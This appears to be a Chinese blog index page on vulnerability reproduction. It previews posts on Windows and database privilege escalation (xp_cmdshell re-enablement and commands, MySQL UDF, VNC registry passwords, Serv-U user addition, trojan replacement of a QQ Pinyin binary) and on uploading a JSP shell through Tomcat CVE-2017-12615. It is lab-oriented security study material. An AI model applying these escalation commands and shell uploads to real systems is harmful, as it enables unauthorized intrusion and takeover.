
漏洞复现
复现漏洞
金色的天空
这个作者很懒,什么都没留下…
展开
-
sql注入简要说明GET等方法的区别
常见的提交方式:GET ,POST,REQUEST下面是演示脚本g代表GET方法的参数p代表POST方法的参数c代表COOKIE的参数r代表REQUEST的参数s代表SERVER的参数<?php$get = $_GET['g'];//接受参数名g的值并赋值给变量getecho $get; //输出变量名g的数据$post = $_POST['p']; //接受参数名p的值并赋值给变量postecho $post ;//输出变量post$c = $_COOKIE['c原创 2021-08-08 10:16:30 · 559 阅读 · 0 评论 -
qq拼音提权
1替换qq拼音里面的QQPYUserCenter.exe2替换成自己的马然后它自己就上线了原创 2021-07-20 15:41:46 · 396 阅读 · 0 评论 -
mssql sa权限提权
1找到mssql的配置文件,拿到密码,【数据库权限需要sa】2连接进入数据库我们需要将xp_cmdshell打开【默认是关闭的】Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')3执行命令exec master.dbo.xp_cmdshell 'whoami'...原创 2021-07-20 11:14:04 · 527 阅读 · 0 评论 -
udf提权
udf利用udf提权UDF为User Defined Function用户自定义函数,也就是支持用户自定义函数的功能。这里的自定义函数要以dll形式写成mysql的插件,提供给mysql来使用。也就是说我们可以通过编写dll文件来实现我们需要的功能,利用UDF提权需要知道root账户的密码文件末为.so,则为linux系统,如果是win,则后缀为dll开始提权1根据数据库版本选择上传udf.dll的位置select version(); #查看版本如果版本号大于5.1.4 上传原创 2021-07-19 18:35:57 · 3853 阅读 · 1 评论 -
vnc提权
1查看进程发现有vnc【我们可以在注册表里面找到vnc的密码】tasklist /svc2在注册表里面找到密码3使用工具破解加密过的密码4最后使用vnc连接原创 2021-07-17 11:46:15 · 273 阅读 · 0 评论 -
serv-u提权
1查看系统进程tasklist /svc根据进程查看杀软 网址https://www.ddosi.com/av/1.php2根据serv-u的pid值查看端口netstat -ano | findstr 10720 #根据pid找到端口号3找到serv-u的版本号【低版本都有漏洞 】根据版本查找漏洞4使用exp添加用户查看用户net user添加成功...原创 2021-07-17 10:43:47 · 184 阅读 · 0 评论 -
tomcat-CVE-2017-12615复现
1环境【github中的vulhub】https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-126152打开网址 http://your ip:8080用脚本扫描发现有CVE-2017-12615漏洞3使用burpsuite抓包然后构造包上传【PUT /1.jsp/ HTTP/1.1 】shell代码<%@ page language="java" import="java.util.*,java.io.*原创 2021-06-29 11:01:10 · 211 阅读 · 0 评论 -
tomcat后台写入getshell
1 环境github:https://github.com/vulhub/vulhub/tree/master/tomcat搭建环境在 Ubuntu 20.04 上安装 docker/docker-compose:# Install pipcurl -s https://bootstrap.pypa.io/get-pip.py | python3# Install the latest version dockercurl -s https://get.docker.com/ | sh#原创 2021-06-27 17:09:39 · 270 阅读 · 0 评论